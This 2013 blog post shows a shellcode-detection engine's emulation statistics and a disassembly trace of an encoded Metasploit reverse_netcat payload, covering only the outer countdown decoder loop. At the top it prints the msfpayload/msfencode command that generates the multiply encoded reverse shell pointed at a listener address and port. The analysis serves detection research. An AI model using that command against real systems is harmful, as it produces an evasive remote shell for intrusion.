Monday, March 18, 2013

Investigation statistics for Metasploit's cmd/unix/reverse_netcat shellcode

======== Payload investigation statistics ========
Payload generation command (run as root; the payload is encoded nine times with x86/shikata_ga_nai and then seven times with x86/countdown, so the outermost layer seen by the emulator is a countdown decoder stub):

#msfpayload cmd/unix/reverse_netcat LHOST=192.168.111.129 LPORT=9988 O | msfencode -e x86/shikata_ga_nai -c 9 -t raw| msfencode -e x86/countdown -c 7 -t raw

Suspicious payload offset: 0

Emulation attribute name                 Value
=======================================================
WRITES_TO_PROCESS_STACK_MEMORY           0
BUFFER_INSIDE_WRITES_COUNT               48
REFERENCES_TO_PROCESS_INTERNALS          0
BUFFER_OUTSIDE_WRITES_COUNT              0
FAR_JUMPS_COUNT                          0
FULLY_INITIALIZED_INSTRUCTIONS           100
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES       1
PROC_CALLS_INSIDE_INV_BUFFER             1
BUFFER_OUTSIDE_READS_COUNT               1
UNDEFINED_DIRECT_CALLS                   0
JUMPS_INSIDE_INV_BUFFER                  48
CORRECTLY_PARSED_INSTRUCTIONS            100
MEMORY_MODIFYING_MATH_INSTRUCTIONS       0
BUFFER_INSIDE_READS_COUNT                0
SYSTEM_CALLS_COUNT                       0
UNRECOGNIZED_CALL_TARGETS                0
REFERENCES_TO_PROCESS_IMPORTS            0
CORRECT_PROCEDURES_CALLS                 0
EIP_RETRIEVAL_INSTRUCTIONS               0
JUMPS_TO_PROCESS_INTERNALS               0
EXECUTED_ARITHMETIC_INSTRUCTIONS         1
CALLS_TARGETED_IMPORTS_SECTION           0
UNRECOGNIZED_JUMP_TARGETS                0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS      0
REFERENCES_TO_PROCESS_EXPORTS            0
EXECUTES_BITS_OPERATING_INSTRUCTIONS     0
IMMEDIATE_OPERANDS_INSTRUCTIONS          0
INDIRECT_BUFFER_REFERENCES               1
MAX_WRITTEN_MEMORY_BLOCK                 0
CORRECTLY_EXECUTED_INSTRUCTIONS          100
READS_FROM_PROCESS_STACK_MEMORY          1
CALLS_TARGETED_EXPORTS_SECTION           0

Note on reading these numbers: the trace below lists exactly 100 instructions, matching CORRECTLY_EXECUTED_INSTRUCTIONS = 100, and 48 XOR writes / 48 LOOP jumps, matching BUFFER_INSIDE_WRITES_COUNT and JUMPS_INSIDE_INV_BUFFER. SYSTEM_CALLS_COUNT = 0 therefore says nothing about the decoded payload; it only reflects that the outer decoder stub makes no system calls before emulation stopped.

More about quttera investigation engine here


======== Detection disassembly ========

(First 100 emulated instructions, apparently the emulator's budget. What follows is the x86/countdown decoder stub: ECX is loaded with 0x369 and incremented to 0x36A (874), the CALL/POP ESI pair recovers the current address, and each XOR [ESI + 7 + ECX], CL decodes one byte of the following data with the low byte of the counter, which LOOP then decrements (0x6A, 0x69, ...). Only 48 of the ~874 iterations are executed here, so the inner shikata_ga_nai layers and the reverse_netcat command string itself are never reached in this trace; the statistics above characterise the outer decoder only, not the final payload.)

MOV ECX (0x00000000),0x00000369                      
CALL 0xBF9D2695                                      
INC ECX (0x00000369)                                 
POP ESI (0x00000000)                                 
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A07),CL (0x6A)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A06),CL (0x69)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A05),CL (0x68)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A04),CL (0x67)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A03),CL (0x66)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A02),CL (0x65)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A01),CL (0x64)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A00),CL (0x63)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FF),CL (0x62)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FE),CL (0x61)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FD),CL (0x60)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FC),CL (0x5F)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FB),CL (0x5E)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FA),CL (0x5D)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F9),CL (0x5C)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F8),CL (0x5B)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F7),CL (0x5A)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F6),CL (0x59)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F5),CL (0x58)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F4),CL (0x57)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F3),CL (0x56)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F2),CL (0x55)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F1),CL (0x54)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F0),CL (0x53)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EF),CL (0x52)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EE),CL (0x51)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29ED),CL (0x50)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EC),CL (0x4F)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EB),CL (0x4E)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EA),CL (0x4D)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E9),CL (0x4C)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E8),CL (0x4B)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E7),CL (0x4A)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E6),CL (0x49)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E5),CL (0x48)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E4),CL (0x47)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E3),CL (0x46)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E2),CL (0x45)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E1),CL (0x44)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E0),CL (0x43)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DF),CL (0x42)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DE),CL (0x41)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DD),CL (0x40)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DC),CL (0x3F)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DB),CL (0x3E)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DA),CL (0x3D)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D9),CL (0x3C)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D8),CL (0x3B)  ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA                                           ;random read instruction